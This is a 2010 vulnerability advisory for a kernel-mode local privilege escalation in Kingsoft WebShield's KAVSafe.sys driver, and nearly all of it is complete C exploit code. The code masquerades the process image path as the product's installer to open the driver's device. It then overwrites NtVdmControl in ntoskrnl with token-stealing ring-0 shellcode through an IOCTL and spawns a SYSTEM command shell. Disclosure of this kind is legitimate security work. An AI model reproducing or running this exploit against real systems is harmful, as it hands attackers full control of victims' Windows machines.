Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
VULNERABLE PRODUCTS Kingsoft WebShield <= 3.5.1.2 (2010.5.23)
Signature Date: 2010-5-23 2:33:54
And
KAVSafe.sys <= 2010.4.14.609 Signature Date:2010-4-14 13:42:26
DETAILS: Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
EXPLOIT CODE:
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS) typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)( HANDLE ProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength );
typedef struct _STRING { USHORT Length; USHORT MaximumLength; PCHAR Buffer; } STRING; typedef STRING *PSTRING; typedef struct _RTL_DRIVE_LETTER_CURDIR { USHORT Flags; USHORT Length; ULONG TimeStamp; STRING DosPath; } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef UNICODE_STRING *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; #define RTL_MAX_DRIVE_LETTERS 32 #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 typedef struct _CURDIR { UNICODE_STRING DosPath; HANDLE Handle; } CURDIR, *PCURDIR; typedef struct _RTL_USER_PROCESS_PARAMETERS { ULONG MaximumLength; ULONG Length; ULONG Flags; ULONG DebugFlags; HANDLE ConsoleHandle; ULONG ConsoleFlags; HANDLE StandardInput; HANDLE StandardOutput; HANDLE StandardError; CURDIR CurrentDirectory; // ProcessParameters UNICODE_STRING DllPath; // ProcessParameters UNICODE_STRING ImagePathName; // ProcessParameters UNICODE_STRING CommandLine; // ProcessParameters PVOID Environment; // NtAllocateVirtualMemory ULONG StartingX; ULONG StartingY; ULONG CountX; ULONG CountY; ULONG CountCharsX; ULONG CountCharsY; ULONG FillAttribute; ULONG WindowFlags; ULONG ShowWindowFlags; UNICODE_STRING WindowTitle; // ProcessParameters UNICODE_STRING DesktopInfo; // ProcessParameters UNICODE_STRING ShellInfo; // ProcessParameters UNICODE_STRING RuntimeData; // ProcessParameters RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ]; } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; typedef struct _PEB { BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the BOOLEAN ReadImageFileExecOptions; // BOOLEAN BeingDebugged; // BOOLEAN SpareBool; // HANDLE Mutant; // INITIAL_PEB structure is also updated. PVOID ImageBaseAddress; PVOID Ldr; struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters; } PEB, *PPEB; typedef LONG KPRIORITY; typedef struct _PROCESS_BASIC_INFORMATION { LONG ExitStatus; PVOID PebBaseAddress; ULONG_PTR AffinityMask; KPRIORITY BasePriority; ULONG_PTR UniqueProcessId; ULONG_PTR InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION; typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) ( LONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength );
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) typedef LONG (WINAPI *PNT_VDM_CONTROL) ( ULONG Service, PVOID ServiceData ); VOID __declspec(naked) R0ShellCodeXP() { __asm { mov eax,0xffdff124 mov eax,[eax] mov esi ,dword ptr[eax+0x220] mov eax,esi searchxp: mov eax,dword ptr[eax+0x88] sub eax,0x88 mov edx,dword ptr[eax+0x84] cmp edx,4 jnz searchxp mov eax,dword ptr[eax+0xc8] mov dword ptr[esi + 0xc8] , eax ret 8 } } VOID NopNop() { printf("nop!\n"); }
#include "malloc.h" int main(int argc, char* argv[]) {
printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n" "Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n" "2010-5-23\n" "By Lincoin \n\nPress Enter"); HKEY hkey ; WCHAR InstallPath[MAX_PATH]; DWORD datatype ; DWORD datasize = MAX_PATH * sizeof(WCHAR); ULONG oldlen ; PVOID pOldBufferData = NULL ;
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS) { if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS) { RegCloseKey(hkey); printf("KSWebShield not installed\n"); getchar(); return 0 ; }
RegCloseKey(hkey); } else { printf("KSWebShield not installed\n"); getchar(); return 0 ; } wcscat(InstallPath , L"\\kavinst.exe");
PROCESS_BASIC_INFORMATION pbi ;
PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ; pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess"); pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);
PPEB peb ;
peb = (PPEB)pbi.PebBaseAddress; oldlen = peb->ProcessParameters->ImagePathName.Length; peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR); pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length); RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length); RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length ); HANDLE hdev = CreateFile("\\\\.\\KAVSafe" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0, OPEN_EXISTING , 0, 0);
if (hdev==INVALID_HANDLE_VALUE) { printf("cannot open device %u\n", GetLastError()); getchar(); return 0 ; } RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length); peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;
PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ; pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation"); X_SYSTEM_MODULE_INFORMATION sysmod ; HMODULE KernelHandle ;
pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL); KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1); if (KernelHandle == 0 ) { printf("cannot load ntoskrnl!\n"); getchar(); return 0 ; } PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");
if (pNtVdmControl == 0 ) { printf("cannot find NtVdmControl!\n"); getchar(); return 0 ; } pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );
printf("NtVdmControl = %08x" , pNtVdmControl ); getchar(); ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP; ULONG pShellCode = (ULONG)R0ShellCodeXP;
PVOID Data = malloc(0x48 + ShellCodeSize);
CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize); CHAR ModuleName[68]= "ntoskrnl.exe" ; RtlCopyMemory( Data , ModuleName , sizeof(ModuleName)); *(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl; *(ULONG*)((ULONG)Data + 68) = ShellCodeSize ; ULONG btr ; if (!DeviceIoControl(hdev , IOCTL_HOTPATCH_KERNEL_MODULE , Data , 0x48 + ShellCodeSize , NULL , 0, &btr , 0 )) { printf("cannot device io control!%u\n" , GetLastError()); getchar(); return 0; }
CloseHandle(hdev);
PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl"); pR3NtVdmControl(0,0); WinExec("cmd.exe" , SW_SHOW); printf("OK!\n ");
getchar();
return 0; }
|